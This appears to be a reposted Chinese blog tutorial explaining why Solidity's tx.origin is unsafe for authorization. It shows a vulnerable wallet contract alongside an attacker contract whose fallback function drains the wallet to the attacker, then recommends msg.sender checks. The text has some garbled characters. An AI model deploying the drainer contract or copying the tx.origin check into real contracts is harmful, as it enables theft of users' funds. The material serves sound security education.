摘要:在智能合約中使用此變量進(jìn)行身份驗證會使合約容易受到類似網(wǎng)絡(luò)釣魚的攻擊。但針對的使用并不用談虎色變��,正確的使用還是有它的應(yīng)用場景的�。漏洞詳解漏洞合約在如下合約中使用到了的判斷。使用提醒不應(yīng)該用于智能合約的授權(quán)��。
簡介
tx.origin是Solidity的一個全局變量�����,它遍歷整個調(diào)用棧并返回最初發(fā)送調(diào)用(或事務(wù))的帳戶的地址��。在智能合約中使用此變量進(jìn)行身份驗證會使合約容易受到類似網(wǎng)絡(luò)釣魚的攻擊��。
但針對tx.origin的使用并不用談虎色變�,正確的使用還是有它的應(yīng)用場景的。
漏洞詳解
漏洞合約
在如下合約中使用到了tx.origin的判斷��。
pragma solidity ^0.4.11;
// 不要使用這個合約���,其中包含一個 bug����。
contract TxUserWallet {
address owner;
function TxUserWallet() public {
owner = msg.sender;
}
function transferTo(address dest, uint amount) public {
require(tx.origin == owner);
dest.transfer(amount);
}
}
上面的合約提供了構(gòu)造函數(shù)(新版本中使用constructor)和轉(zhuǎn)賬方法���。其中在轉(zhuǎn)賬方法transferTo中進(jìn)行了owner的判斷����,這里用到了tx.origin�����。
攻擊者合約
下面看一下攻擊者的合約:
pragma solidity ^0.4.11;
interface TxUserWallet {
function transferTo(address dest, uint amount) public;
}
contract TxAttackWallet {
address owner;
function TxAttackWallet() public {
owner = msg.sender;
}
function () public {
TxUserWallet(msg.sender).transferTo(owner, msg.sender.balance);
}
}
攻擊者創(chuàng)建一個上面的合約��,然后通過各種騙術(shù)來欺騙你用正常合約(TxUserWallet)的擁有者的地址向該攻擊合約(TxAttackWallet)轉(zhuǎn)賬�����。然后區(qū)塊鏈會默認(rèn)調(diào)用攻擊合約的fallback方法�����,也就是最后沒有方法名的方法�,并執(zhí)行轉(zhuǎn)賬操作。
而此時TxUserWallet合約里面的校驗是可以正常通過的�。因為tx.origin是最初發(fā)起交易的地址,也就是合約擁有者的地址���。然后���,地址里面的ether便被轉(zhuǎn)到攻擊者地址中�����。
使用提醒
tx.origin不應(yīng)該用于智能合約的授權(quán)�。更多的時候采用msg.sender == owner來進(jìn)行判斷��。
但它也有自己使用的場景��,比如想要拒絕外部合約調(diào)用當(dāng)前合約則可使用require(tx.origin ==msg.sender)來進(jìn)行實現(xiàn)�。
原文鏈接:https://www.choupangxia.com/2...
文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載,若此文章存在違規(guī)行為�,您可以聯(lián)系管理員刪除。
轉(zhuǎn)載請注明本文地址:http://systransis.cn/yun/75460.html
